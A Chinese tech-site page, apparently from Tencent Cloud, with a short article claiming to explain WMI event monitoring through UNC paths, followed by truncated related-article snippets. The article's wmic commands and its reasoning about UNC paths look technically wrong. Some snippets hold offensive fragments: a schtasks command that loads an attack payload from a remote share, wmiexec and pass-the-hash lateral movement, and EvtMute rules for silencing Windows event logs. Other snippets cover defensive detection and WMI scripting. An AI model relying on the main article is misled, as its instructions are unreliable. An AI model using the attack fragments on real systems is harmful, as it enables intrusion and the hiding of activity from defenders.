如何使用UNC路径进行WMI事件监视

UNC路径是指通过网络访问共享资源的路径，UNC是Universal Naming Convention的缩写。在Windows操作系统中，UNC路径可以用于访问远程计算机上的文件、文件夹以及执行WMI（Windows Management Instrumentation）事件监视等操作。

使用UNC路径进行WMI事件监视的步骤如下：

确保目标计算机上已启用WMI服务，并且具有足够的权限来执行事件监视操作。
在本地计算机上打开命令提示符或PowerShell窗口。
使用以下命令连接到目标计算机的WMI服务：

wmic /node:<目标计算机名称> /user:<用户名> /password:<密码> /namespace:\\root\cimv2 path <WMI类名> create

其中，<目标计算机名称>是指要连接的远程计算机的名称，<用户名>和<密码>是用于连接到远程计算机的凭据，<WMI类名>是指要监视的WMI类名。

根据需要，可以使用/every:<间隔时间>参数指定事件监视的间隔时间，例如：

wmic /node:<目标计算机名称> /user:<用户名> /password:<密码> /namespace:\\root\cimv2 path <WMI类名> create /every:5

上述命令将每隔5秒执行一次WMI事件监视。

执行上述命令后，将开始监视指定的WMI事件。可以根据需要在命令提示符或PowerShell窗口中查看或处理事件。

需要注意的是，使用UNC路径进行WMI事件监视需要确保目标计算机上已启用WMI服务，并且具有足够的权限来执行相关操作。另外，UNC路径也可以用于其他网络操作，如访问共享文件夹等。

腾讯云提供了一系列与云计算相关的产品和服务，包括云服务器、云数据库、云存储等。具体推荐的产品和产品介绍链接地址可以根据具体需求和场景进行选择。

相关·内容

机器人如何使用 RRT 进行路径规划？

机器人需要知道如何在环境中定位自己，或者找到自己的位置，即时绘制环境地图，避开随时可能出现的障碍物，控制自己的电动机以改变速度或方向，制定解决任务的计划等等。 ?...当机器人为了完成一项任务必须从一个起始位置到一个目标位置时，它必须为如何在周围环境中移动做出一个路径计划。在机器人技术的论文上，你经常会看到像下面这样的地图，它有一个起始位置和一个目标位置。...这是移动机器人技术中的一个典型问题，我们通常称之为路径规划。换句话说，机器人如何才能找到一条从起点到目标点的路径？ ? 在过去，我写了一些含彩色图表和冗长解释的文章。...路径规划应该在实际机器人上可行。如果路径规划需要机器人以极小角度转弯，但是机器人不能像汽车一样转动精准的角度，那么就不应该允许这个路径规划。 2. 路径规划应该尽可能接近最优解。...计算一条从随机位置到节点位置的路径，这条路径在机器人上必须是可行的。 5. 继续，如果路径与某物体碰撞，则继续进行下一次迭代。 6.

1.5K2 0

如何使用EvtMute对Windows事件日志进行筛选过滤

写在前面的话在这篇文章中，我们将告诉大家如何使用EvtMute来对Windows事件日志进行筛选过滤。...EvtMute这款工具允许我们使用YARA来进行攻击性操作，并对已经报告给Windows事件日志的事件进行过滤和筛选。...工具使用 EvtMuteHook.dll中包含的是该工具的核心功能，成功注入之后，它将会应用一个临时过滤器，允许报告所有事件，这个过滤器可以动态更新，而不必重新注入。...禁用日志记录最常见的EvtMute使用场景就是禁用系统范围内的事件日志记录了，此时我们可以应用下列Yara规则： rule disable { condition: true } 此时，我们首先需要通过向事件...这个规则可以使用Linux命令行终端轻松转换为Base64编码规则： base64 -w 0 YaraFilters/lsassdump.yar | echo $(</dev/stdin) 接下来，可以使用

8591 0

如何在 Elasticsearch 中使用 pipeline API 来对事件进行处理

接下来，让我们来利用这个 pipeline 来对我们的文档进行处理。我们在 Kibana 中输入： PUT myindex/_doc/1?...pipeline 的应用场景 1) 我们可以在 _bulk API 中进行使用： POST _bulk{"index": {"_index": "my_index", "_id" : "1", "pipeline...": "my_pipeline"}}{"name": "zhang san", "category": "sports"} 2) 我们可以直接在 beats 中进行使用。...请参阅文章 “Elasticsearch：enrich processor （7.5发行版新功能）” 及文章 “如何使用 Elasticsearch ingest 节点来丰富日志和指标”。...pipeline=my_pipeline 具体可以参阅我的文章 “Beats：运用Elastic Stack分析COVID-19数据并进行可视化分析”。

2.8K2 0

域渗透-横向移动命令总结

UNC路径加载位于192.168.26.20共享中的攻击载荷 schtasks /Create /S 10.10.10.19 /TN schtasksname /Sc minute /MO 1 /TR...的利用在横向移动时，测试人员可以利用WMI提供的管理功能，通过已获取的用户凭据，与本地或远程主机进行交互，并控制其执行各种行为。...MSI; 二是远程部署WMI事件订阅，在特定条的事件发生时触发攻击。...利用WMI进行横向移动需要具备以下条件：①远程主机的WMI服务为开启状态默认开启； ②远程主机防火墙放行135端口，这是WMI管理的默认端口。...路径进行远程加载测试人员服务器的MSI文件并进行安装，可以获取远程主机的权限常见工具 impacket wmiexec.py **前提：**主机开启135 445端口 python wmiexec.py

2.2K1 0

内网渗透之哈希传递攻击

主流的Windows操作系统，通常会使用NTLM Hash对访问资源的用户进行身份验证。早期版本的 Windows操作系统，则使用LM Hash对用户密码进行验证。...默认执行SMB版本协商，如果目标支持，则使用SMB2。 Sleep - 默认 = WMI 10 毫秒，SMB 150 毫秒：设置启动 - 睡眠值（以毫秒为单位）。 WMIExec：WMI命令执行。...Source（源） List 和 Recurse：目录的UNC路径。 Delete：文件的UNC路径。 Get：文件的UNC路径。 Put：要上传的文件。...如果未指定完整路径，则该文件必须位于当前目录下。使用"Modify"开关时，“Source”必须是字节数组。 Destination（目标） List 和 Recurse：未使用。...Delete：未使用。 Get：如果使用，value将是下载文件的新文件名。如果未指定完整路径，则将在当前目录下创建该文件。 Put：上传文件的UNC路径。必须指定文件名。

2.5K2 0

【脚本】python中wmi介绍和使用

基于由 Distributed Management Task Force (DMTF) 所监督的业界标准，WMI是一种规范和基础结构，通过它可以访问、配置、管理和监视几乎所有的Windows资源。...提供程序代表使用者应用程序和脚本从WMI托管资源请求信息，并发送指令到WMI托管资源。下面是我们利用WMI编程经常要用到的WMI内置提供程序清单，以供编程参考。...2.事件日志提供程序链接库文件：ntevt.dll 命名空间：root\cimv2 作用：管理 Windows 事件日志，例如，读取、备份、清除、复制、删除、监视、重命名、压缩、解压缩和更改事件日志设置...3.注册表提供程序链接库文件：stdprov.dll 命名空间：root\default 作用：读取、写入、枚举、监视、创建、删除注册表项和值。...接着看python 中的WMI使用是Tim Golden's 的WMI.PY,使用起来非常简单.下面的例子是摘自它自身提供的example import wmi c = wmi.WMI () for

2.2K2 0

WMI使用技巧集

2、如何用WMI获得本地磁盘的信息？首先要在VS.NET中创建一个项目，然后在添加引用中引用一个.net的装配件：System.Management.dll,这样你的项目才能使用WMI。...WMI 可用于生成组织和管理系统信息的工具，使管理员或系统管理人员能够更密切地监视系统活动。例如，可以使用 WMI 开发一个应用程序，用于在 Web 服务器崩溃时呼叫管理员。...管理员可以执行下列任务： " 监视应用程序的运行状况。 " 检测瓶颈或故障。 " 管理和配置应用程序。 " 查询应用程序数据（使用对象关系的遍历和查询）。 ...WMI 结构由以下三层组成： " 客户端使用 WMI 执行操作（例如，读取管理详细信息、配置系统和预订事件）的软件组件。 ...请参见使用 WMI 管理应用程序 | 检索管理对象的集合 | 查询管理信息 | 预订和使用管理事件 | 执行管理对象的方法 | 远程处理和连接选项 | 使用强类型对象获取CPU序列号代码 string

8062 0

WMI 攻击手法研究 – 基础篇 (第一部分)

介绍为何是 WMI WMI 是 Microsoft 的一组规范，旨在对 Windows 系统进行快速高效的管理。...在本系列的后续部分中，我们将了解如何编写自己的 MOF 文件来扩展 WMI 功能集。...不过，它们也可以采用其它类型 (类、事件、事件使用者、方法等) 的形式。...Providers 对生态系统至关重要，因为它们监视来自特定定义对象的事件和数据，比如驱动程序，它在托管对象和 WMI 之间提供了一个桥梁。...体系架构基本就是这样，现在，让我们来了解如何将 WMI 与 PowerShell 一起使用。

1.3K2 1

Windows提权

书是比较老了，anyway，还是本很好的书本篇是第10章Windows提权，主要是做一个进程监视器，然后拦截高权限进程并插入脚本 1、进程监视器利用WMI的API可以监控系统事件 Windows的一些令牌权限...接口 c = wmi.WMI() # 创建进程监控器（监控进程创建） process_watcher = c.Win32_Process.watch_for("creation") while True...: try: # 有创建进程事件会返回 new_process = process_watcher() proc_owner = new_process.GetOwner...proc_owner[0], proc_owner[2]) # 时间 create_data = new_process.CreationDate # 路径...utf8 -*- import tempfile import threading import win32file import win32con import os # 这些是典型的临时文件所在路径

1.1K2 0

ASP.NET 2.0 中 Web 事件

ASP.NET 2.0 还提供了全功能的应用程序监视和健康监视。这个系统是由一个完全可扩展事件模型和一个能将事件发送到多种接收器的事件引擎组成的。...不过，，您可以很容易地在这些基类之上进行构建，以从应用程序重创建并引发您自己的事件。举例来说，您可能创建一个自定义的事件来记录何时第一百个用户单击某一特定的链接。...这个事件记录了进入的请求以及与处理该请求相关联的错误。请求处理错误也是所有错误类别的一个子集。 • 所有审核。可使用健康监视系统通过 WebAuditEvent 提供审核尝试。...这个事件自动记录 Web 应用程序中活动用户的操作。如果您正在使用模拟，审核事件将帮助您对谁在使用您的应用程序，以及他们是如何在使用保持跟踪。 • 失败审核。...举例来说，您可能设置一个检测信号，每 10 分钟发送一个 WMI 事件。同样，您可以为任何未捕获的异常设置一个电子邮件警报。

2.2K7 0

进攻性横向移动

命名管道不是执行有效负载所必需的，但是 CS 创建的有效负载使用命名管道进行通信（通过 SMB）。这只是触及 WMI 功能的表面。...如果您使用远程术语，则需要通过 DCOM 或 WMI 完成。...”方法对于 WebDAV，它仍然使用 UNC 路径，但如果 Windows 无法到达超过 445 和 139 的路径，它最终将回退到端口 80。...可以通过 UNC WebDAV 路径甚至通过 JavaScript 指定 DLL rundll32.exe javascript:".....这只是我记录一些我不知道的事情并弄清楚事情是如何运作的。

2.1K1 0

狩猎二进制重命名

ATT&CK 技术项编号为 T1036 的二进制重命名技术，正在被越来越多的恶意软件所采用，本文介绍如何使用多种方法对该技术进行监控与检测。...WMI 事件几乎可以对所有操作系统事件进行操作，例如：登录事件、进程活动、注册表或者文件更改情况。 ? WMI 提供的能力可以认为是 EDR 用户空间事件跟踪的有限子集，但又无需安装服务或者程序。...出于性能考虑，进程路径和原始名称都实时记录在告警中，并没有进行哈希计算。 ? 类似的也可以输出到日志中。值得注意的是，可以方便地修改示例程序中关于写入日志文件、事件记录函数与函数调用的部分。 ?...局限使用WMI事件作为事件来源的一个局限是通常不能得到成熟的检测用例需要的所有数据。为了丰富数据，需要查询Win32_Process类。...列出的程序列表可能需要对匹配逻辑进行一些调整来兼容不同的主机环境。最后，众所周知，WMI事件处理器是难以管理的。

1.3K2 0

WMI 攻击手法研究 – 识别和枚举 (第四部分)

假设对具有名为 snapshots 的文件夹的目录路径感兴趣。...使用 WMI 查询它看起来像这样： Get-WmiObject -Class win32_directory -Filter 'name LIKE "%snapshots%"' 4 AV 产品进行侦察的第一步是枚举哪种产品为系统提供安全性...Audit Failure 当然，我们可以使用 -Filter 参数来搜索特定的事件类型。...如果该值设置为 True，则对共享访问没有限制，否则可能表明资源中存在敏感内容，或者更好地监视访问共享的客户端。...这就是现在的人们，我将在我们的下一篇文章中与您见面，将重点介绍通过 WMI 进行的 Active Directory 枚举。Sláinte！声明：本站所有文章，如无特殊说明或标注，均为本站原创发布。

5993 0

聊一聊如何在Vue中使用事件总线（ Event Bus）进行组件间通信

事件总线模式允许不同的组件之间进行通信。它要求一个中央枢纽，组件可以通过它发送和接收事件，从而使组件之间的数据交换和交互更加顺畅。...Vue中事件总线的概述 Vue中的事件总线是一种类似于信使的机制，用于帮助组件之间进行通信。就像朋友之间互发消息一样，即使彼此不认识也能进行交流。...首先，由于我们正在使用Vue 3，我们必须更新事件总线设置，以使用mitt库进行事件处理：打开终端并使用以下命令安装mitt库： npm install mitt 或者 yarn add mitt 接下来...注意：如果您使用的是Vue 2，不需要使用mitt库；您可以按照下面的配置继续进行：eventBus.js // eventBus.js file for Vue2 import Vue from '...使用事件总线传递数据涉及到事件负载的使用和复杂数据结构的共享。

1K4 0

Lateral Movement之WMI事件订阅

8452 0

Python wmi 模块的学习

模块会接受WMI方法的传入参数作为Python的关键字参数，并把传出参数作为一个元组进行返回。...，WMI脚本必须具有远程关机(RemoteShutdown)的权限，\ # 也就是说你必须在连接别名中进行指定。...WMI构造器允许你传入一个完整的别名，或者是指定你需要的那一部分。\ # 使用wmi.WMI.__init__的帮助文档可以找到更多相关内容。...print "[%s] %s " % (s.Location, s.Caption, s.Command) # Watch for errors in the event log # 监视事件日志中的错误信息... in a thread # 在线程中使用WMI # 注：WMI技术是基于COM的，要想在线程中使用它，你必须初始化COM的线程模式，就算你要访问一个隐式线程化的服务也是如此。

2.8K2 1

使用 CVE-2021-43893 在域控制器上删除文件

最初，PetitPotam 向受害者服务器发送了一个包含UNC 文件路径的请求。使用诸如强制受害者服务器访问第三方服务器（本例中为 10.0.0.4）之类的 UNC 路径，以便读取所需的文件共享。...PetitPotam 的 UNC 路径指向外部服务器，但 CVE-2021-43893 在内部使用 UNC 路径指向：\\.\C:\....使用指向受害者本地文件系统的 UNC 路径允许攻击者在受害者文件系统上创建文件和目录。这个漏洞有两个主要的警告。首先，这个漏洞的文件写入方面似乎只适用于无约束委派的系统。...其他一些一般性建议：监视 Windows 应用程序事件日志中的事件 ID 4420有助于检测基于 EFSRPC 的黑客工具。...监视Windows 安全事件日志中的事件 ID 4624以进行远程计算机帐户身份验证。审核机器帐户以确保它们不是域管理员的成员。如果可能，审核关键系统的 %PATH% 以确保不存在全局可写路径。

1.4K3 0

OFFENSIVE LATERAL MOVEMENT 横向移动(译文)

通过使用端口135上的远程过程调用（RPC）进行通信以进行远程访问（以及以后的临时端口），它允许系统管理员远程执行自动管理任务，例如远程启动服务或执行命令。它可以通过wmic.exe直接进行交互。...命名管道不是执行有效负载所必需的，但是有效负载CS会使用命名管道进行通信（通过SMB）。...SchTasks SchTasks是“计划任务”的缩写，它最初在端口135上运行，然后使用DCE / RPC进行通信，继续通过临时端口进行通信。...”方法使用WebDAV，它仍然使用UNC路径，但是如果Windows无法通过445和139到达路径，则Windows最终将退回到端口80。...可以通过UNC WebDAV路径甚至通过JavaScript来指定DLL。 rundll32.exe javascript:"..

4.1K1 0

Python通过WMI读取主板BIOS信息

Windows Management Instrumentation (WMI，Windows管理规范) 是Web-Based Enterprise Management (WBEM)的Windows实现...WMI是一项核心的Windows管理技术，WMI作为一种规范和基础结构，通过它可以访问、配置、管理和监视几乎所有的Windows资源，比如用户可以在远程计算机器上启动一个进程；设定一个在特定日期和时间运行的进程...；远程启动计算机；获得本地或远程计算机的已安装程序列表；查询本地或远程计算机的Windows事件日志等等。...Python扩展库wmi完美支持了WMI。首先使用pip命令安装该扩展库，如图： ? 然后编写Python程序，读取并显示BIOS信息： ? 代码运行结果： ?

2.7K10 0

利用WMITool解决浏览器快捷方式启动参数被篡改以及浏览器主页被劫持的问题

金山毒霸会提示浏览器快捷方式异常，并删除该快捷方式分析问题从毒霸删除的文件中恢复快捷方式，查看快捷方式属性，如下图，可以看出，快捷方式的目标被添加了启动参数考虑到可能因为启动项、服务、注册表、事件和任务计划造成...再后来想到了使用ProcessMonitor进行监视，发现每隔一段时间（我这里大概是半个小时的样子）出现一个scrcons.exe进程自动启动并修改快捷方式的命令，然后自动关闭（幸好是半个小时一次，要是...3、5小时一次，那我估计得疯了吧…）查找资料，发现这应该是一个通过WMI发起的定时自动运行脚本。...要查看WMI事件，下载WMITool并安装，安装后打开WMI event viewer，点击左上角register for events，弹出Connect to namespace框，填入“root...到WMITool安装路径（例如：D:\Program Files (x86)\WMI Tools）下，右键点击wbemeventviewer.exe，选择以管理员身份运行！再行删之！

1.8K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云